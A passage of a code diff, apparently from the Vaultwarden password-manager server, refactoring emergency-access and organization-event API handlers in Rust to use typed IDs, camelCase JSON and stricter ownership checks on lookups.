emergency_access: &mut EmergencyAccess,
|
|
||||||
grantee_email: &str,
|
|
||||||
conn: &mut DbConn,
|
|
||||||
) -> EmptyResult {
|
|
||||||
if emergency_access.email.is_none() || emergency_access.email.as_ref().unwrap() != grantee_email {
|
|
||||||
err!("User email does not match invite.");
|
|
||||||
}
|
|
||||||
|
|
||||||
if emergency_access.status == EmergencyAccessStatus::Accepted as i32 {
|
|
||||||
err!("Emergency contact already accepted.");
|
|
||||||
}
|
|
||||||
|
|
||||||
emergency_access.status = EmergencyAccessStatus::Accepted as i32;
|
|
||||||
emergency_access.grantee_uuid = Some(String::from(grantee_uuid));
|
|
||||||
emergency_access.email = None;
|
|
||||||
emergency_access.save(conn).await
|
|
||||||
}
|
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct ConfirmData {
|
struct ConfirmData {
|
||||||
Key: String,
|
key: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/confirm", data = "<data>")]
|
#[post("/emergency-access/<emer_id>/confirm", data = "<data>")]
|
||||||
async fn confirm_emergency_access(
|
async fn confirm_emergency_access(
|
||||||
emer_id: &str,
|
emer_id: EmergencyAccessId,
|
||||||
data: JsonUpcase<ConfirmData>,
|
data: Json<ConfirmData>,
|
||||||
headers: Headers,
|
headers: Headers,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let confirming_user = headers.user;
|
let confirming_user = headers.user;
|
||||||
let data: ConfirmData = data.into_inner().data;
|
let data: ConfirmData = data.into_inner();
|
||||||
let key = data.Key;
|
let key = data.key;
|
||||||
|
|
||||||
let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(mut emergency_access) =
|
||||||
Some(emer) => emer,
|
EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &confirming_user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
if emergency_access.status != EmergencyAccessStatus::Accepted as i32
|
if emergency_access.status != EmergencyAccessStatus::Accepted as i32
|
||||||
@@ -432,15 +417,13 @@ async fn confirm_emergency_access(
|
|||||||
err!("Emergency access not valid.")
|
err!("Emergency access not valid.")
|
||||||
}
|
}
|
||||||
|
|
||||||
let grantor_user = match User::find_by_uuid(&confirming_user.uuid, &mut conn).await {
|
let Some(grantor_user) = User::find_by_uuid(&confirming_user.uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantor user not found.")
|
||||||
None => err!("Grantor user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if let Some(grantee_uuid) = emergency_access.grantee_uuid.as_ref() {
|
if let Some(grantee_uuid) = emergency_access.grantee_uuid.as_ref() {
|
||||||
let grantee_user = match User::find_by_uuid(grantee_uuid, &mut conn).await {
|
let Some(grantee_user) = User::find_by_uuid(grantee_uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantee user not found.")
|
||||||
None => err!("Grantee user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
emergency_access.status = EmergencyAccessStatus::Confirmed as i32;
|
emergency_access.status = EmergencyAccessStatus::Confirmed as i32;
|
||||||
@@ -463,24 +446,22 @@ async fn confirm_emergency_access(
|
|||||||
// region access emergency access
|
// region access emergency access
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/initiate")]
|
#[post("/emergency-access/<emer_id>/initiate")]
|
||||||
async fn initiate_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn initiate_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let initiating_user = headers.user;
|
let initiating_user = headers.user;
|
||||||
let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(mut emergency_access) =
|
||||||
Some(emer) => emer,
|
EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &initiating_user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
if emergency_access.status != EmergencyAccessStatus::Confirmed as i32
|
if emergency_access.status != EmergencyAccessStatus::Confirmed as i32 {
|
||||||
|| emergency_access.grantee_uuid != Some(initiating_user.uuid)
|
|
||||||
{
|
|
||||||
err!("Emergency access not valid.")
|
err!("Emergency access not valid.")
|
||||||
}
|
}
|
||||||
|
|
||||||
let grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
|
let Some(grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantor user not found.")
|
||||||
None => err!("Grantor user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
@@ -503,29 +484,26 @@ async fn initiate_emergency_access(emer_id: &str, headers: Headers, mut conn: Db
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/approve")]
|
#[post("/emergency-access/<emer_id>/approve")]
|
||||||
async fn approve_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn approve_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(mut emergency_access) =
|
||||||
Some(emer) => emer,
|
EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
if emergency_access.status != EmergencyAccessStatus::RecoveryInitiated as i32
|
if emergency_access.status != EmergencyAccessStatus::RecoveryInitiated as i32 {
|
||||||
|| emergency_access.grantor_uuid != headers.user.uuid
|
|
||||||
{
|
|
||||||
err!("Emergency access not valid.")
|
err!("Emergency access not valid.")
|
||||||
}
|
}
|
||||||
|
|
||||||
let grantor_user = match User::find_by_uuid(&headers.user.uuid, &mut conn).await {
|
let Some(grantor_user) = User::find_by_uuid(&headers.user.uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantor user not found.")
|
||||||
None => err!("Grantor user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if let Some(grantee_uuid) = emergency_access.grantee_uuid.as_ref() {
|
if let Some(grantee_uuid) = emergency_access.grantee_uuid.as_ref() {
|
||||||
let grantee_user = match User::find_by_uuid(grantee_uuid, &mut conn).await {
|
let Some(grantee_user) = User::find_by_uuid(grantee_uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantee user not found.")
|
||||||
None => err!("Grantee user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
emergency_access.status = EmergencyAccessStatus::RecoveryApproved as i32;
|
emergency_access.status = EmergencyAccessStatus::RecoveryApproved as i32;
|
||||||
@@ -541,37 +519,31 @@ async fn approve_emergency_access(emer_id: &str, headers: Headers, mut conn: DbC
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/reject")]
|
#[post("/emergency-access/<emer_id>/reject")]
|
||||||
async fn reject_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn reject_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let mut emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(mut emergency_access) =
|
||||||
Some(emer) => emer,
|
EmergencyAccess::find_by_uuid_and_grantor_uuid(&emer_id, &headers.user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
if (emergency_access.status != EmergencyAccessStatus::RecoveryInitiated as i32
|
if emergency_access.status != EmergencyAccessStatus::RecoveryInitiated as i32
|
||||||
&& emergency_access.status != EmergencyAccessStatus::RecoveryApproved as i32)
|
&& emergency_access.status != EmergencyAccessStatus::RecoveryApproved as i32
|
||||||
|| emergency_access.grantor_uuid != headers.user.uuid
|
|
||||||
{
|
{
|
||||||
err!("Emergency access not valid.")
|
err!("Emergency access not valid.")
|
||||||
}
|
}
|
||||||
|
|
||||||
let grantor_user = match User::find_by_uuid(&headers.user.uuid, &mut conn).await {
|
|
||||||
Some(user) => user,
|
|
||||||
None => err!("Grantor user not found."),
|
|
||||||
};
|
|
||||||
|
|
||||||
if let Some(grantee_uuid) = emergency_access.grantee_uuid.as_ref() {
|
if let Some(grantee_uuid) = emergency_access.grantee_uuid.as_ref() {
|
||||||
let grantee_user = match User::find_by_uuid(grantee_uuid, &mut conn).await {
|
let Some(grantee_user) = User::find_by_uuid(grantee_uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantee user not found.")
|
||||||
None => err!("Grantee user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
emergency_access.status = EmergencyAccessStatus::Confirmed as i32;
|
emergency_access.status = EmergencyAccessStatus::Confirmed as i32;
|
||||||
emergency_access.save(&mut conn).await?;
|
emergency_access.save(&mut conn).await?;
|
||||||
|
|
||||||
if CONFIG.mail_enabled() {
|
if CONFIG.mail_enabled() {
|
||||||
mail::send_emergency_access_recovery_rejected(&grantee_user.email, &grantor_user.name).await?;
|
mail::send_emergency_access_recovery_rejected(&grantee_user.email, &headers.user.name).await?;
|
||||||
}
|
}
|
||||||
Ok(Json(emergency_access.to_json()))
|
Ok(Json(emergency_access.to_json()))
|
||||||
} else {
|
} else {
|
||||||
@@ -584,12 +556,13 @@ async fn reject_emergency_access(emer_id: &str, headers: Headers, mut conn: DbCo
|
|||||||
// region action
|
// region action
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/view")]
|
#[post("/emergency-access/<emer_id>/view")]
|
||||||
async fn view_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn view_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(emergency_access) =
|
||||||
Some(emer) => emer,
|
EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &headers.user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
if !is_valid_request(&emergency_access, &headers.user.uuid, EmergencyAccessType::View) {
|
if !is_valid_request(&emergency_access, &headers.user.uuid, EmergencyAccessType::View) {
|
||||||
@@ -609,94 +582,94 @@ async fn view_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn
|
|||||||
CipherSyncType::User,
|
CipherSyncType::User,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await,
|
.await?,
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Ciphers": ciphers_json,
|
"ciphers": ciphers_json,
|
||||||
"KeyEncrypted": &emergency_access.key_encrypted,
|
"keyEncrypted": &emergency_access.key_encrypted,
|
||||||
"Object": "emergencyAccessView",
|
"object": "emergencyAccessView",
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/takeover")]
|
#[post("/emergency-access/<emer_id>/takeover")]
|
||||||
async fn takeover_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn takeover_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let requesting_user = headers.user;
|
let requesting_user = headers.user;
|
||||||
let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(emergency_access) =
|
||||||
Some(emer) => emer,
|
EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &requesting_user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
if !is_valid_request(&emergency_access, &requesting_user.uuid, EmergencyAccessType::Takeover) {
|
if !is_valid_request(&emergency_access, &requesting_user.uuid, EmergencyAccessType::Takeover) {
|
||||||
err!("Emergency access not valid.")
|
err!("Emergency access not valid.")
|
||||||
}
|
}
|
||||||
|
|
||||||
let grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
|
let Some(grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantor user not found.")
|
||||||
None => err!("Grantor user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let result = json!({
|
let result = json!({
|
||||||
"Kdf": grantor_user.client_kdf_type,
|
"kdf": grantor_user.client_kdf_type,
|
||||||
"KdfIterations": grantor_user.client_kdf_iter,
|
"kdfIterations": grantor_user.client_kdf_iter,
|
||||||
"KdfMemory": grantor_user.client_kdf_memory,
|
"kdfMemory": grantor_user.client_kdf_memory,
|
||||||
"KdfParallelism": grantor_user.client_kdf_parallelism,
|
"kdfParallelism": grantor_user.client_kdf_parallelism,
|
||||||
"KeyEncrypted": &emergency_access.key_encrypted,
|
"keyEncrypted": &emergency_access.key_encrypted,
|
||||||
"Object": "emergencyAccessTakeover",
|
"object": "emergencyAccessTakeover",
|
||||||
});
|
});
|
||||||
|
|
||||||
Ok(Json(result))
|
Ok(Json(result))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize)]
|
#[derive(Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EmergencyAccessPasswordData {
|
struct EmergencyAccessPasswordData {
|
||||||
NewMasterPasswordHash: String,
|
new_master_password_hash: String,
|
||||||
Key: String,
|
key: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/emergency-access/<emer_id>/password", data = "<data>")]
|
#[post("/emergency-access/<emer_id>/password", data = "<data>")]
|
||||||
async fn password_emergency_access(
|
async fn password_emergency_access(
|
||||||
emer_id: &str,
|
emer_id: EmergencyAccessId,
|
||||||
data: JsonUpcase<EmergencyAccessPasswordData>,
|
data: Json<EmergencyAccessPasswordData>,
|
||||||
headers: Headers,
|
headers: Headers,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
) -> EmptyResult {
|
) -> EmptyResult {
|
||||||
check_emergency_access_enabled()?;
|
check_emergency_access_enabled()?;
|
||||||
|
|
||||||
let data: EmergencyAccessPasswordData = data.into_inner().data;
|
let data: EmergencyAccessPasswordData = data.into_inner();
|
||||||
let new_master_password_hash = &data.NewMasterPasswordHash;
|
let new_master_password_hash = &data.new_master_password_hash;
|
||||||
//let key = &data.Key;
|
//let key = &data.Key;
|
||||||
|
|
||||||
let requesting_user = headers.user;
|
let requesting_user = headers.user;
|
||||||
let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(emergency_access) =
|
||||||
Some(emer) => emer,
|
EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &requesting_user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
if !is_valid_request(&emergency_access, &requesting_user.uuid, EmergencyAccessType::Takeover) {
|
if !is_valid_request(&emergency_access, &requesting_user.uuid, EmergencyAccessType::Takeover) {
|
||||||
err!("Emergency access not valid.")
|
err!("Emergency access not valid.")
|
||||||
}
|
}
|
||||||
|
|
||||||
let mut grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
|
let Some(mut grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantor user not found.")
|
||||||
None => err!("Grantor user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
// change grantor_user password
|
// change grantor_user password
|
||||||
grantor_user.set_password(new_master_password_hash, Some(data.Key), true, None);
|
grantor_user.set_password(new_master_password_hash, Some(data.key), true, None);
|
||||||
grantor_user.save(&mut conn).await?;
|
grantor_user.save(&mut conn).await?;
|
||||||
|
|
||||||
// Disable TwoFactor providers since they will otherwise block logins
|
// Disable TwoFactor providers since they will otherwise block logins
|
||||||
TwoFactor::delete_all_by_user(&grantor_user.uuid, &mut conn).await?;
|
TwoFactor::delete_all_by_user(&grantor_user.uuid, &mut conn).await?;
|
||||||
|
|
||||||
// Remove grantor from all organisations unless Owner
|
// Remove grantor from all organisations unless Owner
|
||||||
for user_org in UserOrganization::find_any_state_by_user(&grantor_user.uuid, &mut conn).await {
|
for member in Membership::find_any_state_by_user(&grantor_user.uuid, &mut conn).await {
|
||||||
if user_org.atype != UserOrgType::Owner as i32 {
|
if member.atype != MembershipType::Owner as i32 {
|
||||||
user_org.delete(&mut conn).await?;
|
member.delete(&mut conn).await?;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
Ok(())
|
Ok(())
|
||||||
@@ -705,39 +678,39 @@ async fn password_emergency_access(
|
|||||||
// endregion
|
// endregion
|
||||||
|
|
||||||
#[get("/emergency-access/<emer_id>/policies")]
|
#[get("/emergency-access/<emer_id>/policies")]
|
||||||
async fn policies_emergency_access(emer_id: &str, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn policies_emergency_access(emer_id: EmergencyAccessId, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let requesting_user = headers.user;
|
let requesting_user = headers.user;
|
||||||
let emergency_access = match EmergencyAccess::find_by_uuid(emer_id, &mut conn).await {
|
let Some(emergency_access) =
|
||||||
Some(emer) => emer,
|
EmergencyAccess::find_by_uuid_and_grantee_uuid(&emer_id, &requesting_user.uuid, &mut conn).await
|
||||||
None => err!("Emergency access not valid."),
|
else {
|
||||||
|
err!("Emergency access not valid.")
|
||||||
};
|
};
|
||||||
|
|
||||||
if !is_valid_request(&emergency_access, &requesting_user.uuid, EmergencyAccessType::Takeover) {
|
if !is_valid_request(&emergency_access, &requesting_user.uuid, EmergencyAccessType::Takeover) {
|
||||||
err!("Emergency access not valid.")
|
err!("Emergency access not valid.")
|
||||||
}
|
}
|
||||||
|
|
||||||
let grantor_user = match User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await {
|
let Some(grantor_user) = User::find_by_uuid(&emergency_access.grantor_uuid, &mut conn).await else {
|
||||||
Some(user) => user,
|
err!("Grantor user not found.")
|
||||||
None => err!("Grantor user not found."),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let policies = OrgPolicy::find_confirmed_by_user(&grantor_user.uuid, &mut conn);
|
let policies = OrgPolicy::find_confirmed_by_user(&grantor_user.uuid, &mut conn);
|
||||||
let policies_json: Vec<Value> = policies.await.iter().map(OrgPolicy::to_json).collect();
|
let policies_json: Vec<Value> = policies.await.iter().map(OrgPolicy::to_json).collect();
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Data": policies_json,
|
"data": policies_json,
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": null
|
"continuationToken": null
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
fn is_valid_request(
|
fn is_valid_request(
|
||||||
emergency_access: &EmergencyAccess,
|
emergency_access: &EmergencyAccess,
|
||||||
requesting_user_uuid: &str,
|
requesting_user_id: &UserId,
|
||||||
requested_access_type: EmergencyAccessType,
|
requested_access_type: EmergencyAccessType,
|
||||||
) -> bool {
|
) -> bool {
|
||||||
emergency_access.grantee_uuid.is_some()
|
emergency_access.grantee_uuid.is_some()
|
||||||
&& emergency_access.grantee_uuid.as_ref().unwrap() == requesting_user_uuid
|
&& emergency_access.grantee_uuid.as_ref().unwrap() == requesting_user_id
|
||||||
&& emergency_access.status == EmergencyAccessStatus::RecoveryApproved as i32
|
&& emergency_access.status == EmergencyAccessStatus::RecoveryApproved as i32
|
||||||
&& emergency_access.atype == requested_access_type as i32
|
&& emergency_access.atype == requested_access_type as i32
|
||||||
}
|
}
|
||||||
@@ -766,7 +739,7 @@ pub async fn emergency_request_timeout_job(pool: DbPool) {
|
|||||||
for mut emer in emergency_access_list {
|
for mut emer in emergency_access_list {
|
||||||
// The find_all_recoveries_initiated already checks if the recovery_initiated_at is not null (None)
|
// The find_all_recoveries_initiated already checks if the recovery_initiated_at is not null (None)
|
||||||
let recovery_allowed_at =
|
let recovery_allowed_at =
|
||||||
emer.recovery_initiated_at.unwrap() + Duration::days(i64::from(emer.wait_time_days));
|
emer.recovery_initiated_at.unwrap() + TimeDelta::try_days(i64::from(emer.wait_time_days)).unwrap();
|
||||||
if recovery_allowed_at.le(&now) {
|
if recovery_allowed_at.le(&now) {
|
||||||
// Only update the access status
|
// Only update the access status
|
||||||
// Updating the whole record could cause issues when the emergency_notification_reminder_job is also active
|
// Updating the whole record could cause issues when the emergency_notification_reminder_job is also active
|
||||||
@@ -822,10 +795,10 @@ pub async fn emergency_notification_reminder_job(pool: DbPool) {
|
|||||||
// The find_all_recoveries_initiated already checks if the recovery_initiated_at is not null (None)
|
// The find_all_recoveries_initiated already checks if the recovery_initiated_at is not null (None)
|
||||||
// Calculate the day before the recovery will become active
|
// Calculate the day before the recovery will become active
|
||||||
let final_recovery_reminder_at =
|
let final_recovery_reminder_at =
|
||||||
emer.recovery_initiated_at.unwrap() + Duration::days(i64::from(emer.wait_time_days - 1));
|
emer.recovery_initiated_at.unwrap() + TimeDelta::try_days(i64::from(emer.wait_time_days - 1)).unwrap();
|
||||||
// Calculate if a day has passed since the previous notification, else no notification has been sent before
|
// Calculate if a day has passed since the previous notification, else no notification has been sent before
|
||||||
let next_recovery_reminder_at = if let Some(last_notification_at) = emer.last_notification_at {
|
let next_recovery_reminder_at = if let Some(last_notification_at) = emer.last_notification_at {
|
||||||
last_notification_at + Duration::days(1)
|
last_notification_at + TimeDelta::try_days(1).unwrap()
|
||||||
} else {
|
} else {
|
||||||
now
|
now
|
||||||
};
|
};
|
||||||
|
|||||||
@@ -5,10 +5,10 @@ use rocket::{form::FromForm, serde::json::Json, Route};
|
|||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{EmptyResult, JsonResult, JsonUpcaseVec},
|
api::{EmptyResult, JsonResult},
|
||||||
auth::{AdminHeaders, Headers},
|
auth::{AdminHeaders, Headers},
|
||||||
db::{
|
db::{
|
||||||
models::{Cipher, Event, UserOrganization},
|
models::{Cipher, CipherId, Event, Membership, MembershipId, OrganizationId, UserId},
|
||||||
DbConn, DbPool,
|
DbConn, DbPool,
|
||||||
},
|
},
|
||||||
util::parse_date,
|
util::parse_date,
|
||||||
@@ -22,7 +22,6 @@ pub fn routes() -> Vec<Route> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
#[derive(FromForm)]
|
#[derive(FromForm)]
|
||||||
#[allow(non_snake_case)]
|
|
||||||
struct EventRange {
|
struct EventRange {
|
||||||
start: String,
|
start: String,
|
||||||
end: String,
|
end: String,
|
||||||
@@ -30,9 +29,18 @@ struct EventRange {
|
|||||||
continuation_token: Option<String>,
|
continuation_token: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
// Upstream: https://github.com/bitwarden/server/blob/9ecf69d9cabce732cf2c57976dd9afa5728578fb/src/Api/Controllers/EventsController.cs#LL84C35-L84C41
|
// Upstream: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/AdminConsole/Controllers/EventsController.cs#L87
|
||||||
#[get("/organizations/<org_id>/events?<data..>")]
|
#[get("/organizations/<org_id>/events?<data..>")]
|
||||||
async fn get_org_events(org_id: &str, data: EventRange, _headers: AdminHeaders, mut conn: DbConn) -> JsonResult {
|
async fn get_org_events(
|
||||||
|
org_id: OrganizationId,
|
||||||
|
data: EventRange,
|
||||||
|
headers: AdminHeaders,
|
||||||
|
mut conn: DbConn,
|
||||||
|
) -> JsonResult {
|
||||||
|
if org_id != headers.org_id {
|
||||||
|
err!("Organization not found", "Organization id's do not match");
|
||||||
|
}
|
||||||
|
|
||||||
// Return an empty vec when we org events are disabled.
|
// Return an empty vec when we org events are disabled.
|
||||||
// This prevents client errors
|
// This prevents client errors
|
||||||
let events_json: Vec<Value> = if !CONFIG.org_events_enabled() {
|
let events_json: Vec<Value> = if !CONFIG.org_events_enabled() {
|
||||||
@@ -45,7 +53,7 @@ async fn get_org_events(org_id: &str, data: EventRange, _headers: AdminHeaders,
|
|||||||
parse_date(&data.end)
|
parse_date(&data.end)
|
||||||
};
|
};
|
||||||
|
|
||||||
Event::find_by_organization_uuid(org_id, &start_date, &end_date, &mut conn)
|
Event::find_by_organization_uuid(&org_id, &start_date, &end_date, &mut conn)
|
||||||
.await
|
.await
|
||||||
.iter()
|
.iter()
|
||||||
.map(|e| e.to_json())
|
.map(|e| e.to_json())
|
||||||
@@ -53,21 +61,21 @@ async fn get_org_events(org_id: &str, data: EventRange, _headers: AdminHeaders,
|
|||||||
};
|
};
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Data": events_json,
|
"data": events_json,
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": get_continuation_token(&events_json),
|
"continuationToken": get_continuation_token(&events_json),
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/ciphers/<cipher_id>/events?<data..>")]
|
#[get("/ciphers/<cipher_id>/events?<data..>")]
|
||||||
async fn get_cipher_events(cipher_id: &str, data: EventRange, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn get_cipher_events(cipher_id: CipherId, data: EventRange, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
// Return an empty vec when we org events are disabled.
|
// Return an empty vec when we org events are disabled.
|
||||||
// This prevents client errors
|
// This prevents client errors
|
||||||
let events_json: Vec<Value> = if !CONFIG.org_events_enabled() {
|
let events_json: Vec<Value> = if !CONFIG.org_events_enabled() {
|
||||||
Vec::with_capacity(0)
|
Vec::with_capacity(0)
|
||||||
} else {
|
} else {
|
||||||
let mut events_json = Vec::with_capacity(0);
|
let mut events_json = Vec::with_capacity(0);
|
||||||
if UserOrganization::user_has_ge_admin_access_to_cipher(&headers.user.uuid, cipher_id, &mut conn).await {
|
if Membership::user_has_ge_admin_access_to_cipher(&headers.user.uuid, &cipher_id, &mut conn).await {
|
||||||
let start_date = parse_date(&data.start);
|
let start_date = parse_date(&data.start);
|
||||||
let end_date = if let Some(before_date) = &data.continuation_token {
|
let end_date = if let Some(before_date) = &data.continuation_token {
|
||||||
parse_date(before_date)
|
parse_date(before_date)
|
||||||
@@ -75,7 +83,7 @@ async fn get_cipher_events(cipher_id: &str, data: EventRange, headers: Headers,
|
|||||||
parse_date(&data.end)
|
parse_date(&data.end)
|
||||||
};
|
};
|
||||||
|
|
||||||
events_json = Event::find_by_cipher_uuid(cipher_id, &start_date, &end_date, &mut conn)
|
events_json = Event::find_by_cipher_uuid(&cipher_id, &start_date, &end_date, &mut conn)
|
||||||
.await
|
.await
|
||||||
.iter()
|
.iter()
|
||||||
.map(|e| e.to_json())
|
.map(|e| e.to_json())
|
||||||
@@ -85,20 +93,23 @@ async fn get_cipher_events(cipher_id: &str, data: EventRange, headers: Headers,
|
|||||||
};
|
};
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Data": events_json,
|
"data": events_json,
|
||||||
"Object": "list",
|
"object": "list",
|
||||||
"ContinuationToken": get_continuation_token(&events_json),
|
"continuationToken": get_continuation_token(&events_json),
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/organizations/<org_id>/users/<user_org_id>/events?<data..>")]
|
#[get("/organizations/<org_id>/users/<member_id>/events?<data..>")]
|
||||||
async fn get_user_events(
|
async fn get_user_events(
|
||||||
org_id: &str,
|
org_id: OrganizationId,
|
||||||
user_org_id: &str,
|
member_id: MembershipId,
|
||||||
data: EventRange,
|
data: EventRange,
|
||||||
_headers: AdminHeaders,
|
headers: AdminHeaders,
|
||||||
mut conn: DbConn,
|
mut conn: DbConn,
|
||||||
) -> JsonResult {
|
) -> JsonResult {
|
||||||
|
if org_id != headers.org_id {
|
||||||
|
err!("Organization not found", "Organization id's do not match");
|
||||||
|
}
|
||||||
// Return an empty vec when we org events are disabled.
|
// Return an empty vec when we org events are disabled.
|
||||||
// This prevents client errors
|
// This prevents client errors
|
||||||
let events_json: Vec<Value> = if !CONFIG.org_events_enabled() {
|
let events_json: Vec<Value> = if !CONFIG.org_events_enabled() {
|
||||||
@@ -111,7 +122,7 @@ async fn get_user_events(
|
|||||||
